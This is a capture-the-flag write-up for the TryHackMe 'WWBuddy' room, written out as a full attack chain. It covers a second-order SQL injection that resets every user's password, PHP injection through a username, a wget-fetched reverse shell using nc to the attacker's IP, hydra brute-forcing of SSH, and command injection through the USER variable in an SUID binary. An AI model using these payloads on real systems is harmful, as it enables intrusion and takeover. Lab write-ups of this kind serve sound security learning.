Hello. I’m Rahmos. Here is my WWBuddy — TryHackMe — Writeup. Check it out!
First, deploy the machine and nmap for opened ports:
nmap -A -T4 -p- -v <ip>
There are 2 ports opened: 22 (SSH) and 80 (HTTP).
Let’s first access the website:
It’s a login page, but I haven’t got any credential yet. Look at the description:
So, there are 2 pages I can use SQLi: /login and /register. I will use sqlmap to check for SQLi vuln.
sqlmap -u http://<ip>/ login — current-db — batch — cookie=”PHPSESSID=your-SESSID” — forms — crawl=2
Ok so both /login and /register seems not vulnerable. So let’s find other hidden dirs using gobuster:
gobuster dir -u http://<ip>/ -w /path-to-wordlist
I don’t have the permission to view this page. Let’s get back to /login and try again manual SQLi.
First, I try admin : password
Ok so “no account”. What about wwbuddy : password
Ah yes! Now I found a username: WWBuddy. I’ve tried to inject the password with ‘ or 1=1 — , url encode, double url encode, base64 encode,… but it didn’t work.
So let’s sign up a account and login to see what’s inside. I will sign up an account admin : password
Ok so here’s what’s inside the website. Let’s try “Edit info”
I can change my username. Let’s change username to admin’ or 1=1 — -
Ok so the username has been changed.Now, let’s change password.
So in order to change password, the database needs to know whose password is going to be changed. And because I’ve changed my username to admin’ or 1=1 —, it will execute a query like:
update <table-name> set password=<something> where username = ‘admin’ or 1=1 — -’ ;
If it’s correct, then it will change every users’ password to the password I want. Let’s change the password to “plapla”
The password has been changed. So now I’ll try to login as “WWBuddy” with the password “plapla”
Ah yes it worked! Now I’m in as WWBuddy. Look at the chatbox, there are 2 others users: Henry and Roberto. Maybe one of them is the admin? Let’s try to login as them, using the password above.
First, start with henry. Look at the chat between him and Roberto:
Ok now I know the default SSH password is the employee’s birthday. Roberto has changed his default password, but maybe the girl, who is the new employee didn’t! So if I can get this girl’s birthday, I can login to SSH.
Because Henry is the employer, he can be the admin also. Let’s access /admin:
Bingo! He is the admin. View page source (Ctrl + U) and I’ve got the 1st web flag:
Take a look at the end of every line, there is a <br> to break the line, so maybe the backend is using include() to show the logs of fail attempt accessing to /admin, let’s see if it executes php code.
Logout of Henry, and login as wwbuddy. Change the username to:
<?php system(‘id’) ?>
and then access /admin. After that, logout and login again as Henry, and access /admin again to see if anything happens.
The php code has been executed! So, instead of “id”, I will change the code to spawn a reverse shell! Because the username cannot exceed 50 characters, so I will write a shell.sh from my machine, and then use php to wget this shell.
content of shell.sh:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-VPN-ip> 4444>
Start a http server or your machine:
python3 -m http.server 9000
python2 SimpleHTTPServer 9000
Then start a listener:
nc -lvnp 4444
Then change the username of wwbuddy to:
<?php system(‘wget <your-VPN-ip>:9000/shell.sh’) ?>
Again, access /admin, logout, login as Henry and access /admin.
The shell.sh has been transferred. Ok, now change the username to exec this shell.sh:
Doing the same steps above to exec this php code, and you will have the shell into the machine!
Spawn a tty shell using Python:
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Let’s move around:
Ok so now I know the new employee’s name is jenny. Her SSH password will be her birthday, but I haven’t figured it out yet. Because there’s a mysql running, so there will be a mysql log. Access /var/log :
There it is!
Read content of general.log:
I’ve known before there’s a user called “Roberto”. So let’s su to him with this password.
And yes! Now I’m roberto!
Again, spawn a tty shell using Python, and move around and get the 1st user.txt flag:
Put the rest of the content to translate:
Ok so now I know jenny will turn 26 next week. Let’s see when this file was created:
It was created on 27–07–2020. Next week, Jenny is 26, so her date of birth will be from 01/08/1994 to 09/08/1994. Let’s create a wordlist to bruteforce her SSH password, but remember the format on website: mm/dd/yyyy. So change the password to the right format. Here is my example wordlist:
Use hydra to bruteforce:
hydra -l jenny -P jenny.txt ssh://<ip>
Now I’ve found her password. Let’s login to SSH as jenny.
Jenny cannot run sudo on this machine also. Try another way, use find to look for command with SUID bit set:
find / -perm -u=s 2>/dev/null
It’s not a default linux command. So let’s see what it does:
Ok so it will add jenny to group developer and spawn a new shell. Let’s transfer this file to our machine and use ghidra to decompile it.
If you’re in group “developer”, then it will print out “you are already a developer”. But if you are not, it will get variable from env “USER”, then set uid to 0 (uid of root). So if I change the “USER” env to a command, I can execute it at root!
export USER=’;cat /root/root.txt;’
Why I need the ; symbol? Because the program will first execute “usermod” command, so I specify ; to make it execute my command (cat/ root/root.txt) after that.
Then exec /bin/authenticate: